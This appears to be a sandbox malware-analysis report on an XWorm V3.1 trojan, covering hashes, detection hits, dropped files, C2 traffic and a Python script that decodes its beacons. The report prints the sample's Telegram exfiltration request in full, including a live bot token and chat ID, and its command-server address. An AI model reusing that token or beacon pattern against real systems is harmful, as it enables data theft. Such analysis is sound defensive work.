3b5074b1b5d032e5620f69f9f700ff0e | https://wmicrosouab-4ba8.udydzj.workers.dev/ | malicious | HTMLPhisher | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | KxgGGaiW3E.exe | malicious | Quasar | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | https://www.linkedin.com/redir/redirect?url=https%3A%2F%2Flookerstudio%2Egoogle%2Ecom%2Fs%2FscrHqwjeA3k&urlhash=dcQj&trk=public_profile-settings_topcard-website | malicious | Unknown | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | HS202410407 Elemento de proyecto MSMU5083745.pdf.exe | malicious | AgentTesla | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | YZPS3Bfyza.exe | malicious | Quasar | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | CR-FEDEX_TN-775720741041.vbs | malicious | AgentTesla, GuLoader | 149.154.167.220
                                                                              No context
Process: C:\Users\user\AppData\Roaming\X1.exe
File Type: CSV text
Category: dropped
Size (bytes): 654
Entropy (8bit): 5.380476433908377
Encrypted: false
SSDEEP: 12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
MD5: 30E4BDFC34907D0E4D11152CAEBE27FA
SHA1: 825402D6B151041BA01C5117387228EC9B7168BF
SHA-256: A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
SHA-512: 89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
Malicious: false
Reputation: moderate, very likely benign file
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: modified
Size (bytes): 64
Entropy (8bit): 0.34726597513537405
Encrypted: false
SSDEEP: 3:Nlll:Nll
MD5: 446DD1CF97EABA21CF14D03AEBC79F27
SHA1: 36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256: A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512: A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious: false
Reputation: high, very likely benign file
Preview: @...e...........................................................
Process: C:\Users\user\Desktop\X1.exe
File Type: Generic INItialization configuration [WIN]
Category: modified
Size (bytes): 64
Entropy (8bit): 3.6722687970803873
Encrypted: false
SSDEEP: 3:rRSFYJKXzovNsr42VjFYJKXzovuEXn:EFYJKDoWr5FYJKDoG+n
MD5: DE63D53293EBACE29F3F54832D739D40
SHA1: 1BC3FEF699C3C2BB7B9A9D63C7E60381263EDA7F
SHA-256: A86BA2FC02725E4D97799A622EB68BF2FCC6167D439484624FA2666468BBFB1B
SHA-512: 10AB83C81F572DBAA99441D2BFD8EC5FF1C4BA84256ACDBD24FEB30A33498B689713EBF767500DAAAD6D188A3B9DC970CF858A6896F4381CEAC1F6A74E1603D0
Malicious: false
Preview: ....### explorer ###..[WIN]r[WIN]....### explorer ###..r[WIN]r
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode
                                                                              Process:C:\Users\user\Desktop\X1.exe
                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Apr 23 23:55:18 2024, mtime=Tue Apr 23 23:55:21 2024, atime=Tue Apr 23 23:55:21 2024, length=48128, window=hide
                                                                              Category:dropped
                                                                              Size (bytes):736
                                                                              Entropy (8bit):5.030169276645594
                                                                              Encrypted:false
                                                                              SSDEEP:12:8bMs4fiby88CFlsY//7jL0QHkrEjAvoHHcNhplmV:8bAfop8yZr0QHAvoc3plm
                                                                              MD5:EB58EB76080A558EF785B8EE27140696
                                                                              SHA1:B7D9CB9B7C9C9312F680838297B8CC176892AA4E
                                                                              SHA-256:655AC8DD3AACE9B95498A4865F6D4E938C830119F0AD54EB246F8B9F705E0193
                                                                              SHA-512:3D4EEC4A005E3F6A8427A2F6B2A514A6F9D534030758A043B26423AC0EDE9C5C46782C0CB65E25DFEBE630BE98F10CDDE4CA9CEBAD7B1AA0C92C69DA81011A8E
                                                                              Malicious:false
                                                                              Preview:L..................F.... ...<........&......&............................h.:..DG..Yr?.D..U..k0.&...&...... M......NS....At(........t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl.X......B.....................Bdg.A.p.p.D.a.t.a...B.V.1......X....Roaming.@......DWSl.X......C......................f*.R.o.a.m.i.n.g.....T.2......X.. .X1.exe..>......X...X.............................&..X.1...e.x.e.......U...............-.......T...........|.Q......C:\Users\user\AppData\Roaming\X1.exe........\.....\.....\.....\.....\.X.1...e.x.e.`.......X.......571345...........hT..CrF.f4... ...2=.b...,...W..hT..CrF.f4... ...2=.b...,...W..E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................
                                                                              Process:C:\Users\user\Desktop\X1.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):48128
                                                                              Entropy (8bit):5.612164592786903
                                                                              Encrypted:false
                                                                              SSDEEP:768:Jl9f2fd1G1JlnDs8PvGT0Wk8Q0SSP9wTwTLuHFNg9hR8We6+OAhSYgX7WsP6:5ujG1JBDvTn0mwOFW9QWe6+OA7gRi
                                                                              MD5:2AB2F26AB78DBD53CEA3B71C00D568C2
                                                                              SHA1:53F0A2FDDE2F1FE6E1AD44B87B8325624CDEB3FA
                                                                              SHA-256:1F204B43ACFDF5D1088F37B2159D98D5500BDAEEC99CD3F0D6E8CEB77282351B
                                                                              SHA-512:677CF83B6ED165D8BA5734E95BB1B53305CC69CD6A98EDD26F2D8CA75978828D734B36739DBB58BF5B7830FE9C6FF894D4D9BF2AEBE7285BA1C7DE73F5C90E8D
                                                                              Malicious:true
                                                                              Yara Hits:
                                                                              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\X1.exe, Author: Joe Security
                                                                              • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\X1.exe, Author: Joe Security
                                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\AppData\Roaming\X1.exe, Author: Joe Security
                                                                              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\X1.exe, Author: ditekSHen
                                                                              Antivirus:
                                                                              • Antivirus: Avira, Detection: 100%
                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                              • Antivirus: ReversingLabs, Detection: 79%
                                                                              • Antivirus: Virustotal, Detection: 71%, Browse
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....'f................................. ........@.. ....................... ............@.................................D...W.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........j..,f............................................................(....*..(....*.s.........s.........s.........s.........*...0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0............(....(.....+..*....0...........(.....+..*..0...............(.....+..*..0...........(.....+..*..0................-.(...+.+.+...+..*.0.........................*..(....*.0.. .......~.........-.(...+.....~.....+..*..(....*.0..
                                                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                              Entropy (8bit):5.612164592786903
                                                                              TrID:
                                                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                              • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                              • Windows Screen Saver (13104/52) 0.07%
                                                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                                                              File name:X1.exe
                                                                              File size:48'128 bytes
                                                                              MD5:2ab2f26ab78dbd53cea3b71c00d568c2
                                                                              SHA1:53f0a2fdde2f1fe6e1ad44b87b8325624cdeb3fa
                                                                              SHA256:1f204b43acfdf5d1088f37b2159d98d5500bdaeec99cd3f0d6e8ceb77282351b
                                                                              SHA512:677cf83b6ed165d8ba5734e95bb1b53305cc69cd6a98edd26f2d8ca75978828d734b36739dbb58bf5b7830fe9c6ff894d4d9bf2aebe7285ba1c7de73f5c90e8d
                                                                              SSDEEP:768:Jl9f2fd1G1JlnDs8PvGT0Wk8Q0SSP9wTwTLuHFNg9hR8We6+OAhSYgX7WsP6:5ujG1JBDvTn0mwOFW9QWe6+OA7gRi
                                                                              TLSH:1D232A853BE54A15D6FFABB92872A2020631F9079D13EB4E0CD4959B2F37B804E817D6
                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....'f................................. ........@.. ....................... ............@................................
                                                                              Icon Hash:00928e8e8686b000
                                                                              Entrypoint:0x40d09e
                                                                              Entrypoint Section:.text
                                                                              Digitally signed:false
                                                                              Imagebase:0x400000
                                                                              Subsystem:windows gui
                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                              Time Stamp:0x6627F5B0 [Tue Apr 23 17:53:52 2024 UTC]
                                                                              TLS Callbacks:
                                                                              CLR (.Net) Version:
                                                                              OS Version Major:4
                                                                              OS Version Minor:0
                                                                              File Version Major:4
                                                                              File Version Minor:0
                                                                              Subsystem Version Major:4
                                                                              Subsystem Version Minor:0
                                                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                              Instruction
                                                                              jmp dword ptr [00402000h]
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0xd044           0x57          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0xe000           0x4c8         .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x10000          0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity     File Type  Entropy              Characteristics
.text   0x2000           0xb0a4        0xb200    ddacac4e4cf2f6f6b1df5d4f6be90f60  False     0.4819390800561798  data       5.716386442506442    IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc   0xe000           0x4c8         0x600     09d752f2a3b39c09403ff82b3d42639c  False     0.373046875         data       3.6850500375464827   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0x10000          0xc           0x200     8c2019ac91dbd61fba31f9674aa4b2f9  False     0.044921875         data       0.08153941234324169  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name         RVA     Size   Type                                                                               Language  Country  ZLIB Complexity
RT_VERSION   0xe0a0  0x234  data                                                                               -         -        0.4734042553191489
RT_MANIFEST  0xe2d8  0x1ea  XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators  -         -        0.5469387755102041
DLL          Import
mscoree.dll  _CorExeMain
Timestamp                 Protocol  SID      Message                                                      Source Port  Dest Port  Source IP      Dest IP
04/24/24-02:56:33.471440  TCP       2852874  ETPRO TROJAN Win32/XWorm CnC PING Command Inbound M2         4442         49714      91.92.252.220  192.168.2.5
04/24/24-02:56:33.471440  TCP       2852870  ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes  4442         49714      91.92.252.220  192.168.2.5
04/24/24-02:55:52.480977  TCP       2855924  ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound      49714        4442       192.168.2.5    91.92.252.220
Timestamp                             Source Port  Dest Port  Source IP        Dest IP
Apr 24, 2024 02:54:41.276860952 CEST  49704        80         192.168.2.5      208.95.112.1
Apr 24, 2024 02:54:41.436501026 CEST  80           49704      208.95.112.1     192.168.2.5
Apr 24, 2024 02:54:41.436619043 CEST  49704        80         192.168.2.5      208.95.112.1
Apr 24, 2024 02:54:41.468682051 CEST  49704        80         192.168.2.5      208.95.112.1
Apr 24, 2024 02:54:41.628637075 CEST  80           49704      208.95.112.1     192.168.2.5
Apr 24, 2024 02:54:41.683321953 CEST  49704        80         192.168.2.5      208.95.112.1
Apr 24, 2024 02:55:15.784603119 CEST  80           49704      208.95.112.1     192.168.2.5
Apr 24, 2024 02:55:22.328438997 CEST  49710        443        192.168.2.5      149.154.167.220
Apr 24, 2024 02:55:22.328475952 CEST  443          49710      149.154.167.220  192.168.2.5
Apr 24, 2024 02:55:22.328633070 CEST  49710        443        192.168.2.5      149.154.167.220
Apr 24, 2024 02:55:22.339996099 CEST  49710        443        192.168.2.5      149.154.167.220
Apr 24, 2024 02:55:22.340029955 CEST  443          49710      149.154.167.220  192.168.2.5
Apr 24, 2024 02:55:22.956801891 CEST  443          49710      149.154.167.220  192.168.2.5
Apr 24, 2024 02:55:22.956911087 CEST  49710        443        192.168.2.5      149.154.167.220
Apr 24, 2024 02:55:22.961707115 CEST  49710        443        192.168.2.5      149.154.167.220
Apr 24, 2024 02:55:22.961718082 CEST  443          49710      149.154.167.220  192.168.2.5
Apr 24, 2024 02:55:22.961982012 CEST  443          49710      149.154.167.220  192.168.2.5
Apr 24, 2024 02:55:23.011529922 CEST  49710        443        192.168.2.5      149.154.167.220
Apr 24, 2024 02:55:23.024179935 CEST  49710        443        192.168.2.5      149.154.167.220
Apr 24, 2024 02:55:23.072119951 CEST  443          49710      149.154.167.220  192.168.2.5
Apr 24, 2024 02:55:23.581770897 CEST  443          49710      149.154.167.220  192.168.2.5
Apr 24, 2024 02:55:23.581851006 CEST  443          49710      149.154.167.220  192.168.2.5
Apr 24, 2024 02:55:23.581990004 CEST  49710        443        192.168.2.5      149.154.167.220
Apr 24, 2024 02:55:23.587398052 CEST  49710        443        192.168.2.5      149.154.167.220
Apr 24, 2024 02:55:27.254093885 CEST  49714        4442       192.168.2.5      91.92.252.220
Apr 24, 2024 02:55:27.552328110 CEST  4442         49714      91.92.252.220    192.168.2.5
Apr 24, 2024 02:55:27.552412033 CEST  49714        4442       192.168.2.5      91.92.252.220
Apr 24, 2024 02:55:27.581072092 CEST  49714        4442       192.168.2.5      91.92.252.220
Apr 24, 2024 02:55:27.919199944 CEST  4442         49714      91.92.252.220    192.168.2.5
Apr 24, 2024 02:55:33.474509001 CEST  4442         49714      91.92.252.220    192.168.2.5
Apr 24, 2024 02:55:33.527565956 CEST  49714        4442       192.168.2.5      91.92.252.220
Apr 24, 2024 02:55:40.029937983 CEST  49714        4442       192.168.2.5      91.92.252.220
Apr 24, 2024 02:55:40.369287014 CEST  4442         49714      91.92.252.220    192.168.2.5
Apr 24, 2024 02:55:52.480977058 CEST  49714        4442       192.168.2.5      91.92.252.220
Apr 24, 2024 02:55:52.820226908 CEST  4442         49714      91.92.252.220    192.168.2.5
Apr 24, 2024 02:56:03.472305059 CEST  4442         49714      91.92.252.220    192.168.2.5
Apr 24, 2024 02:56:03.527205944 CEST  49714        4442       192.168.2.5      91.92.252.220
Apr 24, 2024 02:56:04.933768988 CEST  49714        4442       192.168.2.5      91.92.252.220
Apr 24, 2024 02:56:05.272315025 CEST  4442         49714      91.92.252.220    192.168.2.5
Apr 24, 2024 02:56:17.387264013 CEST  49714        4442       192.168.2.5      91.92.252.220
Apr 24, 2024 02:56:17.726279020 CEST  4442         49714      91.92.252.220    192.168.2.5
Apr 24, 2024 02:56:29.699573040 CEST  49714        4442       192.168.2.5      91.92.252.220
Apr 24, 2024 02:56:30.051435947 CEST  4442         49714      91.92.252.220    192.168.2.5
Apr 24, 2024 02:56:31.058927059 CEST  49714        4442       192.168.2.5      91.92.252.220
Apr 24, 2024 02:56:31.398250103 CEST  4442         49714      91.92.252.220    192.168.2.5
Apr 24, 2024 02:56:33.471440077 CEST  4442         49714      91.92.252.220    192.168.2.5
Apr 24, 2024 02:56:33.511535883 CEST  49714        4442       192.168.2.5      91.92.252.220
Apr 24, 2024 02:56:35.230669975 CEST  49714        4442       192.168.2.5      91.92.252.220
Apr 24, 2024 02:56:35.569305897 CEST  4442         49714      91.92.252.220    192.168.2.5
Apr 24, 2024 02:56:35.855720043 CEST  49714        4442       192.168.2.5      91.92.252.220
Apr 24, 2024 02:56:36.194293022 CEST  4442         49714      91.92.252.220    192.168.2.5
Apr 24, 2024 02:56:36.194418907 CEST  49714        4442       192.168.2.5      91.92.252.220
Apr 24, 2024 02:56:36.533370972 CEST  4442         49714      91.92.252.220    192.168.2.5
Apr 24, 2024 02:56:38.230964899 CEST  49714        4442       192.168.2.5      91.92.252.220
Apr 24, 2024 02:56:38.570168018 CEST  4442         49714      91.92.252.220    192.168.2.5
Apr 24, 2024 02:56:40.996475935 CEST  49714        4442       192.168.2.5      91.92.252.220
Apr 24, 2024 02:56:41.334292889 CEST  4442         49714      91.92.252.220    192.168.2.5
Apr 24, 2024 02:56:41.334358931 CEST  49714        4442       192.168.2.5      91.92.252.220
Apr 24, 2024 02:56:41.673461914 CEST  4442         49714      91.92.252.220    192.168.2.5
Timestamp                             Source Port  Dest Port  Source IP    Dest IP
Apr 24, 2024 02:54:41.103363037 CEST  53164        53         192.168.2.5  1.1.1.1
Apr 24, 2024 02:54:41.257587910 CEST  53           53164      1.1.1.1      192.168.2.5
Apr 24, 2024 02:55:22.173156977 CEST  65131        53         192.168.2.5  1.1.1.1
Apr 24, 2024 02:55:22.327167034 CEST  53           65131      1.1.1.1      192.168.2.5
Timestamp                             Source IP    Dest IP  Trans ID  OP Code             Name              Type            Class        DNS over HTTPS
Apr 24, 2024 02:54:41.103363037 CEST  192.168.2.5  1.1.1.1  0x34cd    Standard query (0)  ip-api.com        A (IP address)  IN (0x0001)  false
Apr 24, 2024 02:55:22.173156977 CEST  192.168.2.5  1.1.1.1  0x30c8    Standard query (0)  api.telegram.org  A (IP address)  IN (0x0001)  false
Timestamp                             Source IP  Dest IP      Trans ID  Reply Code    Name              CName  Address          Type            Class        DNS over HTTPS
Apr 24, 2024 02:54:41.257587910 CEST  1.1.1.1    192.168.2.5  0x34cd    No error (0)  ip-api.com        -      208.95.112.1     A (IP address)  IN (0x0001)  false
Apr 24, 2024 02:55:22.327167034 CEST  1.1.1.1    192.168.2.5  0x30c8    No error (0)  api.telegram.org  -      149.154.167.220  A (IP address)  IN (0x0001)  false
                                                                              • api.telegram.org
                                                                              • ip-api.com
Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
0           192.168.2.5  49704        208.95.112.1    80                3664  C:\Users\user\Desktop\X1.exe

Timestamp / Bytes transferred / Direction / Data

Apr 24, 2024 02:54:41.468682051 CEST    80 bytes    OUT
    GET /line/?fields=hosting HTTP/1.1
    Host: ip-api.com
    Connection: Keep-Alive

Apr 24, 2024 02:54:41.628637075 CEST    175 bytes   IN
    HTTP/1.1 200 OK
    Date: Wed, 24 Apr 2024 00:54:40 GMT
    Content-Type: text/plain; charset=utf-8
    Content-Length: 6
    Access-Control-Allow-Origin: *
    X-Ttl: 60
    X-Rl: 44
    Data Raw: 66 61 6c 73 65 0a
    Data Ascii: false


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
0           192.168.2.5  49710        149.154.167.220  443               3664  C:\Users\user\Desktop\X1.exe

Timestamp / Bytes transferred / Direction / Data

2024-04-24 00:55:23 UTC    324 bytes   OUT
    GET /bot2128988424:AAEkYnwvOQA95riqRZwlqBxg4GV-odRNOyo/sendMessage?chat_id=966649672&text=%E2%98%A0%20%5BXWorm%20V3.1%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AB98DB222DCA51DFE7851%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro HTTP/1.1
    Host: api.telegram.org
    Connection: Keep-Alive

2024-04-24 00:55:23 UTC    388 bytes   IN
    HTTP/1.1 200 OK
    Server: nginx/1.18.0
    Date: Wed, 24 Apr 2024 00:55:23 GMT
    Content-Type: application/json
    Content-Length: 366
    Connection: close
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Access-Control-Allow-Origin: *
    Access-Control-Allow-Methods: GET, POST, OPTIONS
    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

2024-04-24 00:55:23 UTC    366 bytes   IN
    Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 32 38 35 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 32 31 32 38 39 38 38 34 32 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 42 4f 54 4e 45 54 48 41 43 4b 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 62 65 73 68 6f 6d 61 6e 64 6f 68 61 63 6b 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 39 36 36 36 34 39 36 37 32 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 2e 30 2e 30 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 70 65 67 61 6c 65 78 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 31 33 39 32 30 31 32 33 2c 22 74 65 78 74 22 3a 22 5c 75 32 36 32 30 20 5b 58 57
    Data Ascii: {"ok":true,"result":{"message_id":2855,"from":{"id":2128988424,"is_bot":true,"first_name":"BOTNETHACK","username":"beshomandohack_bot"},"chat":{"id":966649672,"first_name":".0.0","username":"spegalex","type":"private"},"date":1713920123,"text":"\u2620 [XW
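The two HTTP exchanges recorded above are the sample's environment check (the ip-api.com "hosting" lookup, answered with "false" in this run) and its Telegram check-in (a Bot API sendMessage call carrying the bot token, the operator's chat_id and a percent-encoded victim banner). The following added example, which is not code from the report or from the XWorm sample, decodes such requests from proxy-style (host, method, request-target) records: it flags the ip-api.com lookup when the requested fields include "hosting", and parses Telegram Bot API paths into bot id, method, chat_id and the decoded message lines. The SAMPLE_LOG records are constructed here from the two requests shown above plus one benign filler entry; the function and field names are this example's own.

```python
"""Decode XWorm-style network beacons from proxy-style request records.

Added example, not code from the report or from the sample. The records in
SAMPLE_LOG are constructed from the requests recorded in the report above.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Telegram Bot API request paths have the form /bot<bot_id>:<secret>/<method>.
TELEGRAM_PATH_RE = re.compile(
    r"^/bot(?P<bot_id>\d+):(?P<secret>[A-Za-z0-9_-]+)/(?P<method>[A-Za-z]+)$"
)

# Constructed sample: (host, method, request-target) triples mirroring the
# report's two sessions, plus a benign record that must not match.
SAMPLE_LOG = [
    ("ip-api.com", "GET", "/line/?fields=hosting"),
    ("api.telegram.org", "GET",
     "/bot2128988424:AAEkYnwvOQA95riqRZwlqBxg4GV-odRNOyo/sendMessage"
     "?chat_id=966649672&text=%E2%98%A0%20%5BXWorm%20V3.1%5D%0D%0A%0D%0A"
     "New%20Clinet%20:%20%0D%0AB98DB222DCA51DFE7851%0D%0A%0D%0A"
     "UserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro"),
    ("example.com", "GET", "/index.html"),
]


def classify_request(host, method, target):
    """Return a finding dict for a suspicious request, or None for anything else."""
    parts = urlsplit(target)
    # parse_qs already percent-decodes values as UTF-8; do not unquote() a
    # second time, or a literal "%25" in a payload would be decoded twice.
    query = parse_qs(parts.query, keep_blank_values=True)

    if host == "ip-api.com":
        fields = query.get("fields", [""])[0].split(",")
        if "hosting" in fields:
            return {
                "kind": "geoip_hosting_check",
                "http_method": method,
                "host": host,
                "path": parts.path,
                "fields": fields,
            }

    if host == "api.telegram.org":
        m = TELEGRAM_PATH_RE.match(parts.path)
        if m:
            text = query.get("text", [""])[0]
            # Non-empty lines of the decoded message; the first is the family banner.
            lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
            secret = m.group("secret")
            return {
                "kind": "telegram_bot_beacon",
                "http_method": method,
                "method": m.group("method"),
                "bot_id": m.group("bot_id"),
                # Keep only a prefix of the secret: the full token is a live credential.
                "token_prefix": f"{m.group('bot_id')}:{secret[:4]}...",
                "chat_id": query.get("chat_id", [""])[0],
                "banner": lines[0] if lines else "",
                "text_lines": lines,
            }
    return None


def scan(records):
    """Run classify_request over (host, method, target) records and collect hits."""
    hits = []
    for host, method, target in records:
        finding = classify_request(host, method, target)
        if finding is not None:
            hits.append(finding)
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["kind"], {k: v for k, v in hit.items() if k != "kind"})
```

On the report's request the decoded banner is the skull character followed by "[XWorm V3.1]", and the third non-empty line is the per-victim identifier; both are worth keeping as indicators, whereas the full bot token should be stored only in truncated form since it is the operator's credential.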


                                                                              Target ID:0
                                                                              Start time:02:54:34
                                                                              Start date:24/04/2024
                                                                              Path:C:\Users\user\Desktop\X1.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Users\user\Desktop\X1.exe"
                                                                              Imagebase:0xc50000
                                                                              File size:48'128 bytes
                                                                              MD5 hash:2AB2F26AB78DBD53CEA3B71C00D568C2
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.3286328027.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
